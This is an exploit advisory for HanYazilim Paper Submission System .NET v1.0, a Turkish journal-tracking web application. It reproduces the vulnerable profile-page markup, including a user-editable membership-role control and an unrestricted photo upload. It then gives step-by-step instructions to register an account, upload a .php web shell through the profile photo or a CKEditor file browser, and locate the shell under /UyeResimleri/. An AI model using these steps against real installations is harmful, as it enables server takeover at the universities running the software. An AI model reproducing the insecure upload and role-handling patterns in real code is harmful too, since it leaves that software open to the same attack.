#################################################################################
# Exploit Title : HanYazilim Paper Submission System .NET v1.0 Privilege
Escalation / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/02/2019
# Vendor Homepage : hanyazilim.com
# Software Information Link : hanyazilim.com/hakemlimakaletakipsistemi.pdf
videolar.hanyazilim.com
# CKEditor Simogeo Download :
github.com/simogeo/ckeditor-adv_link/archive/master.zip
# Software Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types :
CWE-266: Incorrect Privilege Assignment
CWE-269: Improper Privilege Management
CWE-284: Improper Access Control
CWE-250: Execution with Unnecessary Privileges
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
#################################################################################
# Description about Software :
***************************
HanYazilim Makale Takip Sistemi .NET v1.0 is Turkish software for tracking
articles and journals; it is used by Turkish university faculties.
#################################################################################
# Impact and Consequences :
****************************
* This Software [ Product ] HanYazilim Makale Takip Sistemi .NET v1.0
incorrectly assigns
a privilege to a particular actor, creating an unintended sphere of
control for that actor.
* The software does not restrict or incorrectly restricts access to a
resource from an unauthorized actor.
* The software performs an operation at a privilege level that is higher
than the minimum
level required, which creates new weaknesses or amplifies the consequences
of other weaknesses.
* The software does not properly assign, modify, track, or check privileges
for an actor, creating an unintended sphere of control for that actor.
#################################################################################
# Vulnerable Source Code : [ uyelikbilgilerim.aspx ]
*********************************************
<%@ Page Language="C#" MasterPageFile="~/Uye.master" AutoEventWireup="true"
CodeFile="UyelikBilgilerim.aspx.cs" Inherits="UyelikBilgilerim"
Title="Untitled Page" culture="auto" meta:resourcekey="PageResource1"
uiculture="auto" %>
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
<%--
  Member self-service profile form (UyelikBilgilerim.aspx), rendered inside
  Uye.master. The event handlers referenced below (CheckBox2_CheckedChanged,
  Button1_Click1) live in the code-behind UyelikBilgilerim.aspx.cs, which is
  not shown here, so any server-side authorization or upload checks cannot be
  confirmed from this markup alone.
--%>
<style type="text/css">
.style1
{
width: 801px;
height: 70px;
}
.style7
{
width: 135px;
}
.style351
{
color: #FF0000;
}
.style357
{
width: 135px;
height: 28px;
}
.style358
{
width: 1200px;
height: 28px;
}
</style>
<link href="images/mainstyle.css" rel="stylesheet" type="text/css" />
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1"
Runat="Server">
<table class="tablosayfaadi">
<tr>
<td class="tablosayfayazi">
<asp:Label ID="Label1" runat="server" Text="Uye Detay/Member
Details"
meta:resourcekey="Label1Resource1"></asp:Label></td>
</tr>
</table>
<table class="style1">
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:Label ID="Label4" runat="server" CssClass="style351"
Text="Label"
Visible="False"
meta:resourcekey="Label4Resource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label2" runat="server" Text="AdA+- SoyadA+-"
meta:resourcekey="Label2Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox1" runat="server" Width="290px"
meta:resourcekey="TextBox1Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator1"
runat="server"
ControlToValidate="TextBox1" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator1Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label5" runat="server" Text="Unvan /Title"
meta:resourcekey="Label5Resource1"></asp:Label></td>
<td class="style8">
<asp:DropDownList ID="DropDownList2" runat="server"
meta:resourcekey="DropDownList2Resource1">
<asp:ListItem Value="1"
meta:resourcekey="ListItemResource1">AraAtA+-rma GAPrevlisi</asp:ListItem>
<asp:ListItem Value="2"
meta:resourcekey="ListItemResource2">Doktor</asp:ListItem>
<asp:ListItem Value="3"
meta:resourcekey="ListItemResource3">Yrd.DoASSent</asp:ListItem>
<asp:ListItem Value="4"
meta:resourcekey="ListItemResource4">DoASS. Dr.</asp:ListItem>
<asp:ListItem Value="5"
meta:resourcekey="ListItemResource5">Prof. Dr.</asp:ListItem>
<asp:ListItem Value="6"
meta:resourcekey="ListItemResource6">DiAer</asp:ListItem>
</asp:DropDownList>
<%-- InitialValue="0" matches none of the ListItem values (1-6) declared above,
     so this validator cannot fail for any of the listed choices. --%>
<asp:RequiredFieldValidator ID="RequiredFieldValidator10"
runat="server"
ControlToValidate="DropDownList2" ErrorMessage="*"
InitialValue="0"
meta:resourcekey="RequiredFieldValidator10Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label6" runat="server"
Text="E-Posta /Email"
meta:resourcekey="Label6Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox3" runat="server" Width="290px"
ReadOnly="True"
meta:resourcekey="TextBox3Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator3"
runat="server"
ControlToValidate="TextBox3" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator3Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style357">
<asp:Label ID="Label7" runat="server"
Text="Parola /Password"
meta:resourcekey="Label7Resource1"></asp:Label>
</td>
<td class="style358">
<%-- No TextMode="Password" is set on this control, so the password field
     renders as an ordinary single-line text input.
     NOTE(review): whether the stored password is written back into this box
     is decided in the code-behind (not shown) - confirm. --%>
<asp:TextBox ID="TextBox4" runat="server" Width="290px"
meta:resourcekey="TextBox4Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator4"
runat="server"
ControlToValidate="TextBox4" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator4Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label8" runat="server"
Text="AdegA Telefonu /Office Telephone"
meta:resourcekey="Label8Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox5" runat="server" Width="290px"
meta:resourcekey="TextBox5Resource1"></asp:TextBox>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label9" runat="server"
Text="Cep Telefonu /GSM"
meta:resourcekey="Label9Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox6" runat="server" Width="290px"
meta:resourcekey="TextBox6Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator12"
runat="server"
ControlToValidate="TextBox6" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator12Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label10" runat="server"
Text="Adresi /Address"
meta:resourcekey="Label10Resource1"></asp:Label>
</td>
<td class="style6">
<asp:TextBox ID="TextBox7" runat="server" Width="290px"
meta:resourcekey="TextBox7Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator9"
runat="server"
ControlToValidate="TextBox7" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator9Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label11" runat="server"
Text="Kurumu /Institution"
meta:resourcekey="Label11Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="TextBox8" runat="server" Width="290px"
meta:resourcekey="TextBox8Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator6"
runat="server"
ControlToValidate="TextBox8" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator6Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label12" runat="server"
Text="GAPrevi /Task"
meta:resourcekey="Label12Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="Gorevi" runat="server" Width="290px"
meta:resourcekey="GoreviResource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator13"
runat="server"
ControlToValidate="Gorevi" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator13Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label13" runat="server"
Text="AlanA+- /Field"
meta:resourcekey="Label13Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="Alani" runat="server" Width="290px"
meta:resourcekey="AlaniResource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator7"
runat="server"
ControlToValidate="Alani" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator7Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label14" runat="server"
Text="KA+-sa AzgeASSmiA /Short Biography"
meta:resourcekey="Label14Resource1"></asp:Label></td>
<td class="style6">
<asp:TextBox ID="TextBox10" runat="server" Height="69px"
TextMode="MultiLine"
Width="290px"
meta:resourcekey="TextBox10Resource1"></asp:TextBox>
<asp:RequiredFieldValidator ID="RequiredFieldValidator8"
runat="server"
ControlToValidate="TextBox10" ErrorMessage="*"
meta:resourcekey="RequiredFieldValidator8Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label15" runat="server"
Text="Profil FotografA+- /Profile Photo"
meta:resourcekey="Label15Resource1"></asp:Label>
</td>
<td class="style6" valign="middle">
<asp:Image ID="Image1" runat="server" Height="75px"
Width="75px"
meta:resourcekey="Image1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<%-- Profile-photo upload. The only validator bound to FileUpload1 is a
     RequiredFieldValidator; nothing in this markup restricts the file type,
     size or name. The advisory text on this page reports that non-image files
     are accepted and stored under /UyeResimleri/. Server-side handling should
     allow-list image extensions, verify that the content really is an image,
     generate the stored file name itself, and keep the upload directory
     non-executable (no script handlers mapped).
     NOTE(review): the save logic is in the code-behind, not shown - confirm
     which of these checks, if any, exist there. --%>
<asp:CheckBox ID="CheckBox2" runat="server"
AutoPostBack="True"
oncheckedchanged="CheckBox2_CheckedChanged"
Text="Ayelik Resmini DeAiAtir /Change Profile Photo"
meta:resourcekey="CheckBox2Resource1" />
<asp:FileUpload ID="FileUpload1" runat="server"
Visible="False"
meta:resourcekey="FileUpload1Resource1" />
<asp:RequiredFieldValidator ID="RequiredFieldValidator11"
runat="server"
ControlToValidate="FileUpload1" ErrorMessage="*"
Visible="False"
meta:resourcekey="RequiredFieldValidator11Resource1"></asp:RequiredFieldValidator>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label16" runat="server"
Text="Ayelik Tipi /Membership Type"
meta:resourcekey="Label16Resource1"></asp:Label>
</td>
<td class="style6">
<%-- Membership type (1 = Yazar/author, 2 = Hakem/reviewer, 3 = editor) is
     declared as an editable drop-down on the member's own profile form.
     NOTE(review): a role must never be taken from a self-service postback;
     confirm the code-behind ignores this value for non-administrators, or
     render it read-only from the server-side record. --%>
<asp:DropDownList ID="DropDownList1" runat="server"
meta:resourcekey="DropDownList1Resource1">
<asp:ListItem Value="1"
meta:resourcekey="ListItemResource7">Yazar</asp:ListItem>
<asp:ListItem Value="2"
meta:resourcekey="ListItemResource8">Hakem</asp:ListItem>
<asp:ListItem Value="3"
meta:resourcekey="ListItemResource9">EditAPr</asp:ListItem>
</asp:DropDownList>
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label17" runat="server" Text="Ayelik Durumu
/Membership Status"
meta:resourcekey="Label17Resource1"></asp:Label></td>
<td class="style6">
<%-- Membership status is likewise exposed as an editable control here.
     NOTE(review): same concern as the membership-type drop-down - the
     account's status should come from the server-side record, not from
     this postback. --%>
<asp:CheckBox ID="CheckBox1" runat="server"
meta:resourcekey="CheckBox1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
<asp:Label ID="Label18" runat="server" Text="GA1/4venlik
Kodu"
meta:resourcekey="Label18Resource1"></asp:Label></td>
<td class="style6">
<%-- Security-code (CAPTCHA) answer for the image served by GuvenlikKodu.aspx
     in the next row. No validator is attached in markup, so the comparison
     presumably happens in Button1_Click1 - verify against the code-behind. --%>
<asp:TextBox ID="TextBox11" runat="server"
meta:resourcekey="TextBox11Resource1"></asp:TextBox>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<img src="GuvenlikKodu.aspx"> <asp:Label
ID="lblDusunceler" runat="server"
Visible="False"
meta:resourcekey="lblDusuncelerResource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<%-- Submits the whole form, including the membership type/status controls
     and the optional upload, to Button1_Click1 in the code-behind. --%>
<asp:Button ID="Button1" runat="server" Text="DeAiAtir
/Change" Height="26px"
onclick="Button1_Click1"
meta:resourcekey="Button1Resource1" />
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
<asp:Label ID="Label3" runat="server" Text="Label"
Visible="False"
meta:resourcekey="Label3Resource1"></asp:Label>
</td>
</tr>
<tr>
<td class="style7">
</td>
<td class="style6">
</td>
</tr>
</table>
<table class="tablosayfaadi">
<tr>
<td class="tablosayfayazi">
</td>
</tr>
</table>
</asp:Content>
#################################################################################
# Privilege Escalation Exploit :
***************************
# Usage :
*********
# Register yourself as Author => [ Yazar ] account. [ New Admin ]
# Register with a random e-mail address and choose Professor Doctor.
# Put password for your account.
# Fill All the Blanks. Enter Captchas.
/YeniUyelik.aspx
# After successful registration, the site displays:
Your registration has been completed successfully.
Now you can login to the web site with your username and password..
# Admin Panel Login Path :
************************
/Hata.aspx?Mesaj=3
# Usable Author Control Links :
****************************
/UyeTumMakaleler.aspx?Mesaj=2
/UyeTumMakaleler.aspx?Goster=0
/UyeYayinlanacaklarDefault.aspx?Goster=4
/Arama.aspx
/MakaleGonder.aspx
/Mesajlar.aspx
/GonderilenMesajlar.aspx
/MesajGonder.aspx
Exploitation =>
**************
/ckeditor/plugins/simogeo/Browser.aspx
/UyelikBilgilerim.aspx
The label reads, in Turkish:
Üyelik Resmini Değiştir. [ Change your Membership picture ]
Choose your .php file to upload from My Profile Photo.
Shell Uploaded Successfully.
Directory File Path :
******************
/UyeResimleri/[RANDOM-NUMBER]_[yourshellnamehere].php
#################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################